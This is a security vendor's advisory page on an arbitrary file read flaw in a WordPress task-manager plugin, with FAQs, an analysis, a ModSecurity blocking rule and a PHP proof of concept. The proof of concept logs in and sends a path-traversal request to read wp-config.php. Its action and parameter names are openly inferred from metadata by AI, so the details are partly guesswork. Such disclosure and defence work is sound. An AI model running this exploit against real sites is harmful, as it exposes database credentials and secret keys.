What is CVE-2026-2351?

CVE-2026-2351 is a vulnerability in the Task Manager plugin for WordPress that allows authenticated users with Subscriber-level access or higher to read arbitrary files on the server. This is due to improper handling of user-supplied input in the callback_get_text_from_url function.

How does the vulnerability work?

The vulnerability allows attackers to send a specially crafted POST request to the WordPress AJAX handler, including a parameter that specifies a local file path. If the input is not properly validated, the server may return the contents of sensitive files, such as the wp-config.php file.

Who is affected by this vulnerability?

All WordPress installations using the Task Manager plugin version 3.0.2 or earlier are affected. Administrators should check their plugin version and update if necessary to mitigate this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and locate the Task Manager plugin. Verify that the version is 3.0.2 or earlier; if so, your site is at risk.

What steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, update the Task Manager plugin to the latest version where the issue has been patched. Additionally, implement strict input validation and path sanitization in any custom code that interacts with file paths.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while exploitation requires authentication, the potential impact on confidentiality is significant, as sensitive files can be read by attackers.

What is the significance of the CWE-73 classification?

CWE-73 refers to the ‘External Control of File Name or Path’ issue, which indicates that user input is improperly handled when determining file paths. This classification highlights the need for rigorous input validation to prevent unauthorized file access.

How can I protect sensitive files on my server?

To protect sensitive files, ensure that your server’s file permissions are correctly configured to restrict access. Additionally, consider using security plugins that provide file protection and monitor for unauthorized access attempts.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by crafting a specific AJAX request to read sensitive files. It highlights the steps involved in authentication and the type of input that can be used to exploit the flaw.

Can this vulnerability lead to further attacks?

Yes, successful exploitation can expose sensitive information such as database credentials, which may facilitate further attacks like database compromise or privilege escalation. However, it does not directly allow file write or remote code execution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 28, 2026

CVE-2026-2351: Task Manager <= 3.0.2 – Authenticated (Subscriber+) Arbitrary File Read (task-manager)

CVE ID CVE-2026-2351

Plugin task-manager

Severity Medium (CVSS 6.5)

CWE 73

Vulnerable Version 3.0.2

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2351 (metadata-based):
This vulnerability is an authenticated arbitrary file read flaw in the Task Manager WordPress plugin. The issue resides in the `callback_get_text_from_url()` function. Attackers with Subscriber-level access or higher can exploit this to read sensitive files from the server. The CVSS score of 6.5 (Medium) reflects the high confidentiality impact and low attack complexity.

Atomic Edge research infers the root cause is CWE-73, External Control of File Name or Path. The vulnerable function likely accepts user-supplied input, such as a URL or file path parameter, without proper validation. This input is then used directly in a filesystem operation like `file_get_contents()`. The description confirms the function name but not the exact parameter. The conclusion that user input controls the file target is inferred from the CWE classification.

Exploitation likely occurs via a WordPress AJAX handler. The plugin slug ‘task-manager’ suggests the AJAX action could be named like ‘task_manager_get_text_from_url’ or ‘callback_get_text_from_url’. An authenticated attacker sends a POST request to `/wp-admin/admin-ajax.php`. The request includes the `action` parameter matching the vulnerable hook and a parameter like `url` or `file` containing a local file path (e.g., `../../../../wp-config.php`). The server responds with the file’s contents.

Remediation requires implementing strict input validation and path sanitization. The patched function should validate that the supplied parameter is a legitimate, external URL if that is the intended functionality. It must reject any file scheme (`file://`) or local path sequences (`../`). A whitelist of allowed URL domains or a check ensuring the parameter is a valid HTTP/HTTPS URL would mitigate the flaw. Capability checks should also be reviewed, though the vulnerability already requires authentication.

Successful exploitation leads to full disclosure of sensitive server files. Attackers can read the WordPress configuration file (`wp-config.php`) containing database credentials, secret keys, and salts. They can also read `/etc/passwd`, application source code, or environment files. This data exposure can facilitate further attacks, such as database compromise or privilege escalation, but does not directly allow file write or remote code execution.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2351 (metadata-based)
# This rule blocks exploitation via the inferred AJAX endpoint.
# It matches the exact AJAX URI and the likely vulnerable action parameter.
# The rule also detects common local file path traversal sequences in the 'url' parameter.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20262351,phase:2,deny,status:403,chain,msg:'CVE-2026-2351 via Task Manager plugin AJAX - Arbitrary File Read',severity:'CRITICAL',tag:'CVE-2026-2351',tag:'WordPress',tag:'TaskManager',tag:'WAF'"
  SecRule ARGS_POST:action "@streq callback_get_text_from_url" "chain"
    SecRule ARGS_POST:url "@rx ^(file://|\/\/|\\|(..?\/)+)" 
      "t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2351 - Task Manager <= 3.0.2 - Authenticated (Subscriber+) Arbitrary File Read
<?php
/**
 * Proof of Concept for CVE-2026-2351.
 * Assumptions:
 * 1. The vulnerable AJAX hook is derived from the function name 'callback_get_text_from_url'.
 * 2. The plugin uses the standard WordPress AJAX handler.
 * 3. The vulnerable parameter is named 'url' and accepts local file paths.
 * 4. The attacker has valid Subscriber-level credentials.
 */

$target_url = 'https://example.com/wordpress';
$username = 'subscriber';
$password = 'password';
$file_to_read = '../../../../wp-config.php'; // Target sensitive file

// Initialize cURL session for cookie handling
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress (simulate wp-login.php POST)
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Check for login success (crude check for dashboard redirect or message)
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Step 2: Exploit the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_payload = [
    'action' => 'callback_get_text_from_url', // Inferred AJAX action
    'url' => $file_to_read // User-controlled file path
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_payload);
$exploit_response = curl_exec($ch);

// Output the server's response (file contents)
echo "Exploit Response:n";
echo htmlspecialchars($exploit_response);

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-2351?
Overview of the vulnerability
CVE-2026-2351 is a vulnerability in the Task Manager plugin for WordPress that allows authenticated users with Subscriber-level access or higher to read arbitrary files on the server. This is due to improper handling of user-supplied input in the callback_get_text_from_url function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a specially crafted POST request to the WordPress AJAX handler, including a parameter that specifies a local file path. If the input is not properly validated, the server may return the contents of sensitive files, such as the wp-config.php file.
Who is affected by this vulnerability?
Identifying vulnerable installations
All WordPress installations using the Task Manager plugin version 3.0.2 or earlier are affected. Administrators should check their plugin version and update if necessary to mitigate this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and locate the Task Manager plugin. Verify that the version is 3.0.2 or earlier; if so, your site is at risk.
What steps should I take to mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Task Manager plugin to the latest version where the issue has been patched. Additionally, implement strict input validation and path sanitization in any custom code that interacts with file paths.
What does the CVSS score of 6.5 mean?
Understanding severity levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while exploitation requires authentication, the potential impact on confidentiality is significant, as sensitive files can be read by attackers.
What is the significance of the CWE-73 classification?
Understanding the root cause
CWE-73 refers to the ‘External Control of File Name or Path’ issue, which indicates that user input is improperly handled when determining file paths. This classification highlights the need for rigorous input validation to prevent unauthorized file access.
How can I protect sensitive files on my server?
Best practices for security
To protect sensitive files, ensure that your server’s file permissions are correctly configured to restrict access. Additionally, consider using security plugins that provide file protection and monitor for unauthorized access attempts.
What does the proof of concept demonstrate?
Illustration of the vulnerability
The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by crafting a specific AJAX request to read sensitive files. It highlights the steps involved in authentication and the type of input that can be used to exploit the flaw.
Can this vulnerability lead to further attacks?
Potential for escalation
Yes, successful exploitation can expose sensitive information such as database credentials, which may facilitate further attacks like database compromise or privilege escalation. However, it does not directly allow file write or remote code execution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations